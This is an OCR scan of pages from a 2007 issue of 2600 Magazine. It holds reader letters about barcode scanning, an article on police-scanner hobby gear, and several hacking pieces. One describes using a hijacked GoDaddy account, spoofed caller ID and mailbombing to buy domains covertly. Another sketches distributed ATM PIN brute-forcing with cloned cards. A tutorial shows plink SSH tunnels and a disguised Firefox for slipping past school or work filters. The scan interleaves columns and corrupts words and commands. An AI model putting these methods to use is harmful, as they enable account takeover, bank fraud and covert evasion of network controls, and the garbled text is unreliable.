The UPC (bar code) has the price imbedded in it.
those thousands . . . .
Note that when our price changed, s o did our code.
I have noti ced a " Di spl ay Unti l " date on many
5o something isn't quite right with that explanation.
magazi nes on newsstands and i n bookstores. I
In the case of Barnes c Noble - as it's been explained
assume th i s is the date that the u nsol d copi es are
to us - if the magazine isn't scanned (or if the entire
destroyed. Does 2600 speci fy a certai n date to keep
UPC isn't entered manually) the sale isn't credited
u nsol d copi es on the shel ves unt i l ? I f so, I suggest
to us. And we wind up paying a big percentage for
2600 share that date wi th your readers, and we
any "missing" magazines. 5oif you ever get a receipt
al l can make a concerted effort to vi si t any news-
that doesn 't display our name on it from the UPC
stand sel l i ng 2600 on or j ust before that date. At that
database, we'd really like to know about it since that
poi nt, we shoul d purchase as many of t he rema i n i ng
probably means (with this bookstore chain at least)
copi es as we have the means to and di stri bute them
that we're not getting credited.
Page 46 2600 Magazine
Dear 2600:
I j ust thought I woul d tel l you guys when I bought
my l atest mag at my l ocal Barnes c Nobl e the cl er k
there, who i s al so an avi d reader, poi nted out t o
me that t hat photo of the regi ster i s not a " gl i tch"
because a l l magazi nes have to be manual l y entered.
They scan the mag but enter the pri ce. He sai d it was
l i ke t hi s nati onwi de, accordi ng to the manager.
TwitcH
This also makes little sense to us since the price
should be included in the UP( at least in the States.
But at least there's an indication that a sale of the
magazine is being logged.
Dear 2600:
As d man in my 60s I may be an excepti on to
the norm. I di dn' t know how much 2600 cost before
and I do not know what i t costs now. When I see a
new i ssue on the newsstand I buy i t. The onl y way I
woul d care about the pr i ce woul d be for it to get so
h i gh as to cal l i tsel f to my attent i on. But for now the
content i s worth whatever you are chargi ng. Hope
you can hang on.
Johnson Hayes
We intend to and thanks for the support.
Dear 2600:
When you were embroi l ed in the DeC55 l awsu i t
I t hought that a good way to hel p you was t o become
a (vocal ) l i fet i me subscri ber. I now real i ze that I may
be contri but i ng to your economi c woes at t hi s poi nt.
So, i s there any way I can contri bute to your maga
zi ne (renew my l i feti me subscri pti on, i f you wi l l ) ?
Alfredo Octavio
Thanks for your coo cern but a lifetime suhscrip
tion is just that: good for your lor our) entire lifetime.
It's theoretically possible that if you died and then
were brought hack to lili that you would thcn have
to get a second suhscription hut you would likely
also have to change your name and address since
our computer would assume that you were' still living
your first life. You could lie / us and just say you're
somebody you'n' not and we would never know. tr
you could also make a lot of enemies by suhscribing
unwilling people to uur magazine for their entire liie
time. Whatever you do, don 't feel guilty. Our litime
subscrihers have been quite essential for our exis
tence and we 're glad you 're a part of uur family.
Dear 2600:
I j ust received 2 3 . 4 today. I was surpri sed when
you wrote t wo whol e pages expl ai ni ng why you
had to i ncrease the pri ce. I thi nk ynur magazi ne i s
sti l l worth more t han you charge. The i niormati on
that i s presented i n the magazi ne i s a true i nspi ra
t i on because i t remi nds me why consumeri sm and
commerci al i s m hi te. The shar i ng of i nformati on
i s beauti fu l , and so often we get fed rubbi sh by
greedy corporat i ons that try to Fox thei r way i nto our
mi nds.
So t hank you so much for your magazi ne and
you shoul d never have to apol ogi ze to you r readers
for a modest pri ce i ncrease over the years. I can' t
thi n k of any other magazi ne that charges what you
do and can br i ng the same l evel of content. Wai t
unti l my son can start readi ng! You ' l l have another
reader then.
Di giCOl
We want to thank you and the many others who
have written with words of support. We've heen
through some difficult times and we've faced a lot
of challenges but iLs the spirit of our readers that
always comes through and makes i t al l worthwhile.
Dear 2600:
What cost i ncrease? I di dn' t even noti ce. If I
compare the cost to l earni ng/i nformat i on rati o I am
sti l l gett i ng more t han my money' s wort h. I don' t get
through a l l of one i ssue before I buy the next. Your
hookl et and PC Answers out of Engl and are t he best
buys on the market.
I n readi ng your comments about why your pri ces
go up, I want to l et you know what happened to me
on my l ast purchase.
Fi rst, the books were on a fl at bottom shel f under
t i l ted shel ves. They are harder to see. I f I were not
speci fi ca l l y l ooki ng for i t I woul d mi ss i t.
Second, at checkout, your book was the onl y one
of t hree that had to be manual l y entered. No wavi ng
t he magi c wand. Ar e they payi ng you ? I don't know.
I do wonder how the new bi ndi ng wi l l hol d
up wi t h me fol di ng i t al l the way back for eas i er
readi ng.
Keep up the good wor k.
Prof. Morris Sparks
Dear 2600:
I ' ve seen the i ssue of s hr i nk ment i oned i n
two i ssues of 2600 i f I remember correct l y. Whi l e
readi ng "Transi t i on" I rea l i zed t hat al most every t i me
I ' ve purchased a 2600, i ncl udi ng the l atest i ssue, t he
cash i er cannot get the bar code t o SCH and punches
i n the pr i ce manua l l y. So far I ' ve purchased a tota l
of around ei ght to ten i ssues from Bares & Nobl e,
Horders, and Wegman' s . I have my l atest recei pt
whi ch contai ns the fol l owi ng for my purchase:
IeriodioaI
7 2 5 2 7 4 0 3 I 5 0 6 6 4 IR 6 . 2 5
Thi s was from a Horders store. I ' m not s ure if t hat
i dent i fi es i t as a 2600 or not . I f you thi nk you guys
are gett i ng shafted on thi s one, I cou l d send you the
recei pt. I don ' t know i f any of thi s hel ps, but I fi gured
it coul dn' t hurt to send a heads up.
F
In this case it appears the cashh'r punched ill
the UPC manually as those numbers match the ones
which can he found on our Winter 2006-2007 { ,sue
But we have to wonder if there is some sort of a fail
safe method to prevent the wrong numhers from
being entered or, worse, no numbers at all. Our bar
code is up to the industry standard and should work
everywhere.
Spring 2007Page 47
by Tom from New England (aka Mr. !com) the l ocati on I ' m stayi ng at and do a " Loca-
Havi ng been an RF hacker for a coupl e
t i on/Frequency ( Range) " search off Gu l l foss
decades, I ' m gl ad to see an i ncrease i n
for a 5 to 1 5 mi l e radi us from sai d l ocat i on,
i nterest among technol ogi cal enthus i asts i n
dependi ng on how popul ated i t i s. I f you ' re
the wonders that expl or i ng the radi o spec-
i n a pl ace such as New York Ci ty, even doi ng
trum has t o offer. Th i ngs have changed qu i te
a one-mi l e radi us search wi l l provi de you
a bi t s i nce 1 987 when I wrote my fi rst art i cl e
wi t h more frequency data t han you ' l l i n i ti al l y
for 2600. What a l ong, strange tri p i t ' s been.
know what to do wi th .
One of the stapl es of the mon i tor i ng enthu- The probl em wi th raw l i cense/frequency
si ast was Radi o Shack' s Police Call frequency
data i s that you cou l d get a dozen frequen
di rectory. No matter where you l i ved i n the
ci es for a speci fi c agency or busi ness and
USA, you cou l d wa l k i nto the McDonal d's sti l l have no i dea what speci fi c use the
of el ectroni cs stores and have a l l the publ i c
frequency has . The Radio Reference si te can
safety records of you r l ocal e and a bunch of
somet i mes hel p wi th t hi s, dependi ng on
usefu l reference mater i al at you r fi ngerti ps.
how many acti ve contr i but i ng scanni sts are
Later i ssues i ncl uded a CD conta i n i ng the
i n the area of i nterest. Despi te the demi se of
whol e count ry' s publ i c safety l i cense data,
Police Call, there are sti l l numerous " l ocal "
sel ected bus i nesses, and a l l t he other extras
frequency di rectori es that may be avai l abl e
t hat ensured Tandy Corp. recei ved at l east
at you r nearby radi o shop. Those of you i n
some of you r hard-earned cash once a year.
the Northeast who want a ni ce compl ete
The most usefu l part of Police Call was some-
pr i nted di rectory to hol d i n you r hands are
t hi ng they cal l ed the Consol i dated Frequency
bl essed by the presence of Scanner Master i n
Li st. I t tol d you what servi ce was a l l ocated
Massachusetts. Thei r web s i te i s http: //www.
to a part i cul ar frequency. Wi th it, you cou l d
scannermaster. com/ and they sel l some rather
l ook up a frequency l i ke 45. 88 MHz and
excel l ent detai l ed gui des for the Northeast.
qu i ckl y fi nd out i t was al l ocated to the Fi re
Thei r Southern New England Pocket Guide
Servi ce for " i ntersystem" communi cati ons
i s a constant mon i tor i ng compani on of mi ne
(that frequency by the way, happens to be the
al ong wi th a wel l - used Mol es ki ne pocket
i nter-county channel for New York State fi re
j our nal .
departments) . Unfort unatel y Police Call 's l ast Readers of 2600 shou l d b e fami l i ar wi th
edi t i on was publ i shed i n 2005 . You sti l l mi ght
the Si gna l Stal ker pol i ce scanners, s i nce there
be abl e to fi nd a copy of the l ast edi t i on at a
have been a coupl e of art i cl es publ i shed i n
l ocal Radi o Shack a n d i t wou l d be a worth-
previ ous i ssues. Many peopl e have an i nterest
wh i l e reference j ust for the Consol i dated
i n hear i ng si gnal s i n thei r i mmedi ate vi ci n i ty.
Frequency Li st.
Upon seei ng someone nearby wi th a hand-
The I nternet has a number of sources
hel d radi o, they wonder what the frequency
for frequency data. The most popul ar si te i s
i s and what ' s bei ng tal ki ng about. Back i n
Radio Reference a t http: //www. radi orefer-
the ol d days, we used handhel d frequency
ence. com/. Or i gi nal l y a si te for i nformat i on
counters l i ke the $99 Radi o Shack speci al ,
about trunked radi o systems, i t ' s probabl y the
or a much more expensi ve Optoel ectroni cs
bi ggest s i te of user-contr i buted frequency and
Scout . There were al so " nearfi el d recei vers"
radi o system data on the Net. The second si te
l i ke the Optoel ectroni cs R- 1 U I nterceptor and
i s run by t he FCC, and i s common l y known by
Xpl orer, but t hey too were beyond the fi nan
the n i ckname " Gul l foss. " I t i s the FCC General
ci al reach of many hobbyi sts. The frequency
Menu Reports page, whi ch i s the whol e FCC
counters worked OK, but you general l y had
l i cense database. I ts URL i s http: //gu l l foss2 .
to get wi th i n a hundred feet or so of the trans
fcc. gov/reports/i ndex. cfm. What I l i ke to do
mi tter. You al so had to contend wi th cont i nu
i s take t he l at i tude/l ongi tude coordi nates of
ousl y transmi tt i ng h i gh-power annoyances
Pge 48 2600 Magazine
such as broadcasters and pagers. necessari l y better because of the frequency
The Si gnal Stal ker changed a l l that. I nstead counter ' s l ack of sel ecti vi ty. A hi gh-gai n
of carryi ng around both a frequency counter antenna attached t o a frequency counter
and a scanner, your scanner serves doubl e usual l y res ul ted i n t he counter di s pl ayi ng
duty. Annoyi ng si gnal s can be i gnored, and the frequency of a l ocal pager or broadcast
you can i mmedi atel y hear the si gnal upon transmi tter. Thi s i s not the case wi t h a Si gnal
detect i on. You can scan you r usual frequen- Stal ker. A h i gh gai n antenna combi ned wi th
ci es and set i t to al ert you when somethi ng t he Si gnal Sta l ker ' s abi l i ty to l ock out annoyi ng
nearby keys up. You no l onger have to get as si gnal s and sel ect i ndi vi dual frequency bands
cl ose to a transmi tter, as i t can detect si gnal s wi l l res ul t i n an i ncrease i n near-fi el d recep
from 1 000 feet away. And you cou l d own ti on range. Us i ng a magnet- mount scanner
a Si gnal Sta l ker for under $ 1 00. The ubi q- antenna on the car, I ' ve "detected" my coun
u i tous model was t he Radi o Shack PRO-83 ty' s fi re di spatch frequency from ten mi l es
handhel d. Now di scont i nued, it retai l ed for away, and a fi ve watt VHF- l ow band RIC l i n k
$ 1 20 bu t was often on sal e for u nder $ 1 00. from about 2 000 feet.
You sti l l mi ght fi nd one at the cl earance pri ce One t hi ng I noti ced about the PRO-83
of $ 70. I ts l esser- known twi n i s the Uni den i s that the suppl i ed short antenna i s barel y
BC-92XLT. Uni den refers t o t he near-fi el d adequate. The BC-92XLT has a s l i ght l y better
recepti on feature as Cl ose Cal l , but i t works stock antenna, but as a general r ul e a l l stock
the same way as Radi o Shack. Other t han rubber duck antennas t hat come wi t h scan
some mi nor fi rmware di fferences, t hey ar e ner s are desi gned for u n i forml y average
the same u n i t . A certai n i nfamous retai l store to medi ocre performance across a wi de
chai n from Arkansas has it i n the mobi l e el ec- frequency range. I suggest upgradi ng wi th
troni cs department for onl y $99. 99. There a better aftermarket antenna. You can get a
are al so hi gher-end Si gnal Stal ker/Cl ose Cal l Radi o Shack #320-034 Del uxe Rubber Duck
scanners avai l abl e that have extra features Antenna for general purpose mon i tori ng, or
such as trunk tracki ng, P2 5 recepti on, and t hei r #20-006 tel escopi ng wh i p for when
cont i nuous 25- 1 300 MHz ( mi nus cel l u l ar) you ' re i n a fi xed l ocat i on and want opt i mum
frequency coverage. recept i on. I n a s i mi l ar vei n, when dr i vi ng i n
One of the ma i n compl ai nts I hear about a veh i cl e havi ng the scanner wi t h a rubber
t he Si gnal Stal kers i s the l ack of capabi l i ty duck antenna si tt i ng on the seat next to you
to l ock out annoyi ng frequenci es whi l e i n won' t c u t i t. Get an external antenna for you r
Si gnal Stal ker mode. For starters, i f you have vehi cl e. Whi l e on the subject of antennas,
a Un i den BC-92 XLT, enabl e the Cl ose Cal l you mi ght be abl e to scrounge someth i ng up
" pager ski p" functi on. Thi s wi l l el i mi nate the dependi ng on what bands you are i nterested
vast maj ori ty of annoyi ng si gnal s. On both i n. CB antennas work very wel l on the VHF
u ni ts, when you fi nd an annoyi ng si gnal i n Low band 00- 50 MHz) . Dual -band (two
SS/CC mode s i mpl y hi t " FUNC" twi ce and meter and 70 em) hand antennas wi l l work for
then " LlO" . Th i s wi l l l ock out the frequency. the VHF h i gh and UHF bands ( 1 38- 1 44 and
The user manual i s a l i ttl e vague on that. 440-5 1 2 MHz) . Ol d AMPS cel l u l ar anten nas
Un l i ke frequency counters, the si gnal are perfect for the 800 and 900 MHz bands,
acqui si t i on ti me on Si gnal Stal kers i s a l i tt l e but you wi l l need a TNC-to- BNC antenna
l onger. To shorten thi s t i me, desel ect bands adapter to use them.
you ' re not at the moment i nterested i n I ' ve recei ved a fai r number of emai l s from
hear i ng acti vi ty on. For exampl e, i f you ' re i n peopl e aski ng what scanner they shoul d buy.
t he mi ddl e of some rural farml and and t here For a bas i c non-tr unk-tracki ng, non- P2 5 uni t
i s no UHF or 800 MHz act i vi ty, then desel ect the PRO-83 or BC-92XLT i s an excel l ent
those bands. Si nce you wi l l probabl y ( note val ue for the money j ust to have near-fi el d
I sai d probabl y) not hear anythi ng on t he recepti on capabi l i ty. When i t comes to t runk
ai rcraft band u n l ess you l i ve next to an ai rport, tracki ng scanners however I woul d avoi d
you mi ght want to desel ect the ai rcraft band buyi ng one at the moment. Why? The reason
as wel l . You never know what you mi ght be i s somethi ng cal l ed " rebandi ng" . At present
mi ssi ng however. I don ' t l i ve near an a i rport, the 800 MHz l and mobi l e band i s a host to
but I ' ve gotten Si gnal Stal ker h i ts from pl anes both publ i c safety communi cati ons and the
fl yi ng overhead at l ow al ti tude. Nextel servi ce. Thi s has resul ted i n i nterfer-
Many of you who have pl ayed wi th ence i ssues over the years. To el i mi nate the
frequency counters were aware of the fact probl em, the FCC i s doi ng the fol l owi ng:
that a " bi gger" ( hi gh gai n) antenna was n' t 1 . Movi ng Nextel to the top of the 800
Spring 2007Page 49
MHz band and publ i c safety to t he bottom.
At present, publ i c safety communi cati ons are
most l y on the edges of the band, wi th Nextel
i n the mi ddl e.
2. Changi ng the channellfrequency
spaci ng from 1 2 . 5 KHz to 6. 25 KHz. Th i s
wi l l doubl e the amount of channel s avai l
abl e. Consequent l y, radi o users wi l l have to
convert to narrowband modul at i on.
3 . Eventual l y movi ng Nextel off the 800
MHz band and up to the 1 . 9 GHz PCS band.
Th i s i s troubl esome for trunk-tracki ng
scanners because of Number 2 above. Each
1 2 . 5 KHz frequency i s assi gned a channel
number. The channel numberlfrequency
assi gnments wi l l change when the band goes
to the narrower spaci ng. Tru nk-trackers use
those channel numbers to determi ne what
frequency to tune i n order to fol l ow a tal k
group on the system. After a system has been
rebanded, the current crop of trunk-tracki ng
wi l l not fol l ow the system as the channel
numberlfrequency assi gnments wi l l be al l
wrong.
New Engl and was supposed to be the fi rst
to go through rebandi ng, and the process has
yet to occu r as of the t i me of thi s wri t i ng. I ' d
expect other parts of the country t o go t hrough
s i mi l ar del ays. As far as scanner manufac
t urers are concerned, Radi o Shack i ni t i al l y
sai d the fi rmware of thei r t r unk-tracki ng scan
ners wou l d be upgradabl e but then changed
thei r mi nd. I f you have a current model Radi o
Shack trunk-tracker scanner, you wi l l be out
of l uck once rebandi ng occu rs t o the systems
you moni tor. Uni den ( Bearcat) has sai d that
thei r current model s wi l l be fi rmware upgrad
abl e and some upgrades have al ready been
made avai l abl e to correct a few bugs found
i n ear l y versi ons of t he fi rmware. However I
suspect that u n l ess the rebandi ng progresses
qui cker, once the " current" model s become
di sconti nued, product support ( i ncl udi ng
fi rmware upgrades) for them wi l l cease to
exi st as is usual l y the case wi t h "obsol ete"
equ i pment.
Once the FCC, l and mobi l e radi o i ndustry,
and Nextel get thei r col l ecti ve act together
and fi gure out once and for a l l the fi nal fate of
the 800 MHz band, then t hi ngs wi l l be a l l fi ne
and dandy. Unt i l then, i f you s i mpl y have to
buy a trunk-tracker spend as l i tt l e as poss i bl e
for a used one at a hamfest. Thi s way you
won ' t feel so bad when i t s i mpl y becomes a
convent i onal scanner after rebandi ng. If you
have a l arge sum of money burn i ng a hol e
i n you r pocket, and you s i mpl y have t o buy
somethi ng new, get one of those computer
control l ed, DC-to- Dayl i ght commun i ca
t i ons recei vers made by l eom or AOR. They
actual l y wi l l never become obsol ete. Wi th
t he computer i nterface, they can be used
wi th the Trunker software to fol l ow t runked
radi o systems, even post-rebandi ng. They are
readi l y modi fi ed to provi de a 1 0. 7 MHz I F
output i n order to use an AOR ARD25 P2 5
decoder box for demodul at i ng P-25 audi o.
They al so featu re fu l l frequency coverage
from 1 00 KHz to 2+ GHz ( mi nus cel l u l ar i n
the Uni ted States) . No matter what frequency
gets rea l l ocated to what, you ' l l be abl e to
t une i t . As a new RF hobbyi st, a communi ca
ti ons recei ver i s more versat i l e than a pol i ce
scanner. You can l i sten to l ocal VHF/UHF
publ i c safety communi cati ons one week,
t une down the spectrum a l i tt l e bi t for short
wave broadcasters and ham radi o operators
( 3880-3885 KHz - AM mode) the next week,
do a l i ttl e experi mentati on wi th computeri zed
mon i tor i ng the next, and fi ni s h the month out
pl ayi ng wi th moni tori ng the vari ous di gi tal
modes you encounter on the ai r.
DCCy.CD0 lC


by SlEZ
Have you ever l ooked i nto how i nsecure
godaddy. com real l y i s? Before I go i nto detai l
l et ' s fi rst make someth i ng cl ear. To do th i s you
must have access to someone' s GoDaddy
account . You cannot say that i t i s total l y
i mposs i bl e for a GoDaddy account t o be
broken i nto. Ema i l s pam pl us carel ess peopl e
are proof of t hi s .
Let ' s say you somehow got access t o a
GoDaddy account that you are not the owner
of. Al l you wou l d have to do i s cl i ck on My
Account and any type of i nformati on you
wou l d need about the person is ri ght in front
of you . I n there you wi l l see My Customer
4 whi ch cou l d come i n handy. Then by
goi ng i nto Account Settings the person ' s fu l l
name, address, ci ty, state, z i p code, country,
Pge 50
2600 Magazine
and phone number are di spl ayed. Now i n
Account Security I nformation whi ch i s
under Account Settings the ema i l address
used under the account i s di spl ayed. Al so
i n Account Security I nformation they were
n i ce enough to di s pl ay the Cal l -i n Pi n whi ch
i s a four di gi t number t hat you suppl y t o t he
Customer Servi ce or Techni cal Support repre
sentati ve when you cal l GoDaddy i n order to
veri fy your i denti ty and customer account.
The fi nal pi ece of i nformati on you wi l l need
i n Account Setti ngs i s Pyment I nformation
whi ch di spl ays the type of credi t card used,
the l ast four di gi ts of the credi t card, expi ra
ti on date, and when the credi t card was l ast
used. What I do not understand i s why a l l
thi s i nformati on i s bei ng di s pl ayed and onl y
protected by one si ngl e password.
Someone can s i mpl y cal l up GoDaddy and
buy a domai n name under someone el se' s
account. You can even spoof the number
you're cal l i ng from to the one under the
account. Go Daddy wi l l ask you for the i nfor-
mati on that I have l i sted above and before
addi ng the domai n to your account the sal es
rep wi l l ask you for the l ast four di gi ts of the
credi t card. Now say someone does thi s . They
,
can eas i l y make another GoDaddy account
and transfer over the domai n and i f the owner
l ogs i nto thei r account there wi l l be no trace
of the newl y purchased domai n name.
Any acti ons made under the account wi l l
noti fy the account owner vi a emai l . Si mpl y
by mai l bombi ng t he account owner ' s ema i l
wi th the emai l address sal es@godaddy.
com and support@godaddy. com about 500
t o 999 ti mes wi l l i ncreases the chance that
the person wi l l del ete a l l those ema i l s al ong
wi th the ones rea l l y sent from godaddy. com.
Al so keep i n mi nd many peopl e use the same
password for a l l thei r accounts and the same
ema i l address for a l l thei r busi ness. Even i f
the person has a di fferent password for thei r
emai l , wi th t he i nformati on di spl ayed i n thei r
GoDaddy account you mi ght be abl e to reset
the password. That ema i l address cou l d be
connected to an onl i ne banki ng account or
even PyPI .
There i s no need for thi s i nformat i on to
be di spl ayed for any reason . Nothi ng can be
1 00 percent hacker-proof but havi ng sensi ti ve
i nformat i on out l i ke that i s n' t a smart move
by GoDaddy. To fix thi s probl em a l l they
wou l d have to do i s have a securi ty questi on
prompt. I f answered correctl y, access wou l d
be granted t o Account Settings. Thi s mi ght
not sol ve the probl em fu l l y but i t woul d make
it harder for peopl e to obtai n personal i nfor
mati on about the owner.
Another secur i ty fl aw i n Account Secu
rity I nformation i s the Enable Card on Fi l e
opt i on. Al l you need to do i s check the
opti on, confi rm the password, and then you
can purchase i tems on godaddy. com wi thout
a credi t card and wi thout cal l i ng up to soci al
engi neer t he sal es reps.
by S. Pidgorny opens new opportuni ti es for attacks agai nst
Di stri buted den i al of servi ce attacks are a wel l known targets. A good exampl e wou l d
sad real i ty of today. Coordi nated botnets are be PI N brute forci ng i n an automat i c tel l er
usi ng thei r numbers to overwhel m thei r target, machi ne (ATM) .
consumi ng ei ther a l l processi ng resources ATM cards general l y use a magnet i c stri p
or a l l bandwi dth. The attacks are i ncredi bl y and requi re a PI N t o get t he account bal ance
hard to counter, as often there' s no detectabl e or wi thdraw cas h. You have three tri es t o get
di ference between the bots and l egi t i mate the PI N ri ght. Afer the fi rst or second t i me you
users. Even i f there i s, the i ntrusi on preven- can cancel and get the card back. PI Ns are
t i on systems shou l d have enough capaci ty to genera l l y four di gi t deci mal numbers ( 0000
process l arge numbers of requests, maki ng t o 9999) . So one gets two shots at guess i ng
them targets of the attack themsel ves. the PI N (ATM swal l ows the card after the
But what i f the part i ci pants of di stri buted t hi rd wrong PI N attempt), and the probabi l i ty
attacks were not bots but real peopl e? That of a successfu l guess i s therefore 0. 02 . I t wi l l
Spring 2007Page 51
take days of ful l t i me PI N guessi ng for some
body to get access to the money i f they have
a card but don ' t know the PI N.
Unl ess PI N brute forc i ng i s di stri buted.
Copyi ng an ATM card is a tri vi al task. Equi p
ment for it i s cheap and wi del y avai l abl e.
Pi ct ure a group of 5000 peopl e doi ng PI N
guessi ng at the same ti me. The coordi nator
di st r i butes magneti c str i p i nformati on, the
force (do we cal l them hubots?) wri tes str i ps
on whi te pl asti c and uses 5000 ATMs at t he
same t i me wi th preassi gned PI Ns, j ust two
for each hubot. Success is certai n, the attack
takes j ust mi nutes, and i s as hard t o counter
as any other di stri buted attack.
A few factors sti l l offset the r i sk: formi ng
the army of h ubots, whi ch i s very geographi
cal l y di stri buted (thousands of ATMs are
needed), extraordi nary organi zati onal s ki l l
i s needed, the magneti c stri p i nformat i on
needs t o be obtai ned somehow, and moni
tori ng systems coul d fl ag t he use pattern and
prevent t he card from bei ng used unt i l t he
owner contacts the bank. But the requ i red
resources can a l ready be i n pl ace, as the
cr i mi nal economy has si gni fi cant scal e and
workforce. Onl y compl etel y swi tchi ng from
eas i l y c1 0nabl e cards to cryptographi c ch i p
cards wi l l ful l y mi t i gate the r i sk of such
di stri buted attacks agai nst bank cards.
Shouts to the P&A squad, J. K. , Cookie,
and Nicky. We shal outsmart.
once you have establ i shed a connecti on, you
jamespengui n@gmai l . com
have an enti re t unnel to send data back and
Pi cture you rsel f i n the fol l owi ng s i tuati on.
forth t hrough.
You ' re at school/work mi ndi ng your own
Now the great thi ng about thi s under-
bus i ness s i mpl y perusi ng the I nternet and al l
ground t unnel i s that i t i s bi g enough s o that
i t has to ofer. However when you try to vi si t
i t can fi t more than one messenger. As a
your n i nj a cl an' s websi te, you are i nstead
res ul t it is poss i bl e to send messengers wi th
presented wi th a web page stat i ng that thi s
messages for a server at Poi nt C through the
parti cul ar websi te i s bl ocked. Natural l y you
u nderground tunnel , have them rel ayed from
are shocked and ofended by such an act i on.
Poi nt B to poi nt C, from Poi nt C back t o Poi nt
So do somethi ng about i t; sneak through l i ke
B, and then through the underground t unnel
a n i nj a wi th an SSH tunnel .
back t o you at Poi nt A.
A Brief Explanation
For a more detai l ed expl anat i on see the
For those who have no i dea what an SSH
Wi ki pedi a page about Tunnel i ng Proto
t unnel is, i magi ne that whenever you estab-
col s : http : / /en . wikipedia . org/wiki/Tunnel
l i s h a connecti on to an SSH server that you ..ing..rotocol
are di ggi ng an underground t unnel from Te Guards
your l ocati on at Poi nt A to the server ' s l oca- Let ' s assume that the network that you
ti on at Poi nt B i n whi ch a messenger carri es are currentl y on has a server that fi l ters web
messages back and forth between you and traffi c, i s guarded by a fi rewal l that does not
the server. The reason that the t unnel i s a l l ow i nbound connect i ons, and onl y a l l ows
underground i s because your connecti on i s outbound connect i ons on ports 21 (ftp), 80
encrypted. Because of thi s peopl e cannot see ( http) , and 44J ( https) . How is t hi s i nforma
what i s bei ng sent back and forth t hrough ti on useful , you ask? Wel l , we know that
your connecti on ( underground tunnel ) . Now we can get traffi c out of three di fferent ports
Page 52 2600 Mae
whi ch means that you have three openi ngs
from whi ch you can di g a t unnel .
Preparation
I n order to successful l y sneak t hrough the
fi rewal l/web fi l ter you wi l l need two t hi ngs:
An SSH server l i sten i ng on one
of the ports that you are al l owed outbound
access on. For hel p sett i ng up an SSH server
see: http : / / l ifehacker . com/ software/ home
-server/ geek-to-l ive--set-up-a-personal-
-home-ssh-server-2 0 5 0 9 0 . php
An SSH cl i ent, ei ther PuTTY ( GU I )
or Pl i nk (Command Li ne) . Thi s arti cl e covers
the use of Pl i nk. You can downl oad both
PuTTY and Pl i nk from: http : / /w. chiark .
-greenend . org . uk/-sgtatham/puttyl
A Si mpl e Tunnel
The command for creat i ng a t unnel wi th
pl i n k i s plink -N -P PortNumber -L Source
-Port : RemoteServer : BOFVlCOPOF1 J User
-Name SSHServerAddress. For Port Number use
a port that you have outbound access on. For
SourcePort use any number between 1 and
65535. For RemoteServer use t he I P address
of a remote server you wou l d l i ke to access.
For Servi cePort use the port of t he servi ce
you ' d l i ke to access on the remote server.
For exampl e, to t unnel an http connec
ti on to a remote server at 72 . 1 4. 207. 99
t hrough an SSH server l i steni ng on port 2 1
and wi th the address 1 23 . 1 2 3 . 1 2 3 . 1 23, the
command woul d l ook l i ke plink -N -P 2 1
I 1 3 3 7: 72 . 1 4 . 2 07. 9 9 : 8 0 - 1 YourUsername
1 2 3 . 1 2 3 . 1 2 3 . 1 2 3 . Once you have entered
your password, open up a web browser and
enter http : / / 1 27. 0 . 0 . 1 : 1 3 37 i nto t he address
bar and you wi l l be l ooki ng at the Googl e
home page.
Note l . When usi ng the above command
syntax, afer you have provi ded your correct
password, the bl i nki ng cursor wi l l drop a l i ne.
Thi s means t hat your l ogi n was successfu l .
Note 2: Tunnel s can b e used to proxy
a connecti on to any address on any port,
however t hi s art i cl e wi l l focus on tunnel i ng
web pages.
Dynamic SOCKS-based J utsu!
Whi l e a s i mpl e t unnel may be al l ri ght
for connect i ng to one speci fi c server, a n i nj a
such as yoursel f has many di ferent servers to
browse and i t is i mpract i cal to create a t unnel
for each di ferent server t hat you may want
to connect to. Thi s i s where dynami c SOCKS
based port forwardi ng comes i nto pl ay. I n
nOn- 1 3 3 7- ni nj 4 terms t hi s i s an SSH t unnel
s i mi l ar t o the one created i n the secti on
above, but i ts RemoteServer and Servi ce Port
are dynami c. However its SourcePort remai ns
t he same.
The command for creati ng a dynami c
t unnel i s , plink -N -P PortNumver -D Source
-Port -1 UserName SSHServerAddress.
Creat i ng a dynami c t unnel i s a l i tt l e l ess
confusi ng ( syntax wi se) then a s i mpl e tunnel ,
however us i ng i t i s s l i ght l y more compl ex.
Web Browsi ng Over a Dynamic Tunnel
I n order to use a web browser over a
dynami c t unnel , you need to be abl e to
modi fy t he browser ' s proxy sett i ngs. I n
your cur rent restri cted envi ronment you are
unabl e to modi fy your school ' s/work' s web
browser (wh i ch i s I nternet Expl orer (boo! ) )
sett i ngs. However, thi s i s n' t a probl em for a
n i nj a l i ke yoursel f. Al l you must do is acqui re
a web browser that you have fu l l control
over. However, you can ' t l eave any trace of
usi ng another web browser (for i t i s not the
ni nj a way), so i nsta l l i ng a new one i s out of
the quest i on. Thi s i s where Fi refox Portabl e
( a mobi l e i nsta l l -free versi on of Fi refox) steps
i n. Downl oad FP from http : / / portableapps .
MCOR/apps l 1O1CIOC1/ICLOX _[OI1DlC ( thi s
art i cl e covers us i ng Fi refox Portabl e 2 . 0) and
extract i t t o a USB j ump dri ve or to your hard
dr i ve for l ater bur ni ng to a CD.
To use FP over a dynami c tunnel : Fi rst
start FP, cl i ck on Tools and choose Options.
Cl i ck the button at the top l abel ed Advanced.
Under the connection sect i on cl i ck the
button l abel ed Settings . . . I n the connec
ti ons setti ngs wi ndow choose the thi rd opt i on
l abel ed Manual proxy confguration : and i n
the entry box next t o t he words SOCKS Host
enter 1 2 7. 0 . 0. 1 . I n the entry box to the ri ght
of the entry box for SOCKS Host enter the
SourcePort you used when creat i ng your
dynami c tunnel . Make s ure that SOCKS v5 i s
sel ected and cl i ck OK.
FP wi l l now send and recei ve a l l t raffi c
over your dynami c t unnel ; however by defaul t
F P does DNS l ookups l oca l l y whi ch can gi ve
away what you are browsi ng (very un- ni nj a
l i ke) . To confi gure FP to send DNS l ookups
over a dynami c tunnel : I n the address bar
type about : confg and hi t enter; i n the entry
box next to the word Filter enter network .
-proxy . socks_remote_dns, ri ght cl i ck the
resul t and sel ect the Toggle opt i on.
Cloaking FP to look l i ke I E
Wel l now you ' ve got a copy of FP usi ng
a dynami c t unnel t o browse t he web, but FP
i s n' t very steal thy and any pass i ng teacher/
admi ni strator wi l l be a l l over you when they
see i t. As a n i nj a steal th i s very i mportant,
so your next pr i ori ty i s to confi gure Fi refox
Portabl e so that it l ooks l i ke I nternet Expl orer.
Spring 2007Page 53
You wi l l need the fol l owi ng i n order to efec
ti vel y cl oak your copy of FP:
- Neofox I E 6: https . l l addons . mozilla .
"org/frefox/ 4 3 2 7 / . A theme that makes PF
l ook l i ke I E 6. 0
- Fi resometh i ng: https II addons mozilla .
. org/frefox/ 3 1 1 . An extensi on that al l ows
you to change the ti tl e of the web browser.
